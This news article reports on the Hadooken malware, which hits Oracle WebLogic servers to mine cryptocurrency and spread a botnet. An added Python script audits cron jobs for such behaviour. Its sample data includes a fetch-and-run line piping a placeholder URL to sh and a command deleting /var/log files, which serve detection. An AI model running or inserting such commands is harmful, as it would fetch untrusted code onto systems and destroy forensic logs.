Thursday, November 21, 2024

New Malware Targets Oracle WebLogic Servers, Exploiting Vulnerabilities to Mine Cryptocurrency

A new malware campaign targeting Oracle WebLogic servers has been identified, exploiting vulnerabilities in Linux environments to mine cryptocurrency and launch distributed denial-of-service (DDoS) attacks. Dubbed “Hadooken,” this malware was discovered by Aqua Security researchers. It infiltrates systems through weak credentials or unpatched Oracle WebLogic servers, which are commonly used in enterprise environments for critical applications.

Hadooken operates by deploying two payloads: a shell script and a Python script. These scripts retrieve the malware from remote servers, and once inside, Hadooken performs several malicious actions, including mining cryptocurrency and distributing the Tsunami botnet. The Tsunami botnet has a history of targeting services like Oracle WebLogic and Jenkins, often deployed in Kubernetes clusters. It is particularly dangerous due to its ability to launch both cryptomining operations and DDoS attacks.

One of the malware’s strategies involves creating cron jobs to ensure persistence, running the cryptominer at random intervals while blending its malicious activities with legitimate system processes. Additionally, it wipes system logs to make detection and forensic analysis more difficult.
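A defender can audit cron entries for the behaviours described above: jobs that fetch and execute remote content, run binaries from world-writable directories, or delete logs. The following is an added example, not code from Aqua Security's report; the rule patterns, the `parse_entry` and `audit` helpers, and the sample entries (including the placeholder host and account names) are assumptions made for illustration.

```python
import re

# Heuristic rules: assumptions chosen for this example, not indicators from the report.
RULES = {
    "remote-fetch-exec": re.compile(r"\b(curl|wget)\b[^;]*\|\s*(sh|bash|python[0-9.]*)\b"),
    "world-writable-path": re.compile(r"(^|[\s;&|])/(tmp|var/tmp|dev/shm)/\S+"),
    "log-tampering": re.compile(r"\b(rm|shred|truncate)\b[^;|&]*\s/var/log\b|>\s*/var/log/\S+"),
}

def parse_entry(line, system=False):
    """Return (schedule, user, command), or None for blanks, comments, VAR=value and malformed lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"[A-Za-z_]\w*\s*=", line):
        return None
    n_sched = 1 if line.startswith("@") else 5      # "@reboot" style or five time fields
    n_head = n_sched + (1 if system else 0)         # /etc/crontab and /etc/cron.d add a user field
    parts = line.split(None, n_head)
    if len(parts) <= n_head:
        return None
    return " ".join(parts[:n_sched]), (parts[n_sched] if system else None), parts[-1]

def audit(text, system=False):
    """Return [(line number, user, [rule names], command)] for entries matching any rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line, system)
        if entry is None:
            continue
        _, user, command = entry
        hits = sorted(name for name, rx in RULES.items() if rx.search(command))
        if hits:
            findings.append((lineno, user, hits, command))
    return findings

# Constructed sample in /etc/cron.d format; host name and account names are placeholders.
SAMPLE = """\
# maintenance jobs
MAILTO=root
17 * * * * root run-parts /etc/cron.hourly
*/7 * * * * root /tmp/.cache/updater >/dev/null 2>&1
@reboot weblogic curl -fsSL http://placeholder.invalid/a | sh
30 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
5 4 * * * root rm -rf /var/log/*.log
"""

if __name__ == "__main__":
    for lineno, user, hits, command in audit(SAMPLE, system=True):
        print(f"line {lineno} user={user} {','.join(hits)}: {command}")
```

Matches are leads for review rather than verdicts; legitimate jobs can trip these patterns, so compare hits against a known-good baseline of the host's cron configuration.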

This attack highlights the importance of keeping systems updated and properly configured, especially as Hadooken exploits known vulnerabilities in Oracle WebLogic servers. The infrastructure behind the attack is linked to Aeza International LTD, a known bulletproof hosting provider involved in previous cryptomining and ransomware campaigns.

For more details, you can refer to the sources from Aqua Security, BleepingComputer and CyberMaterial.

Aiden Thomas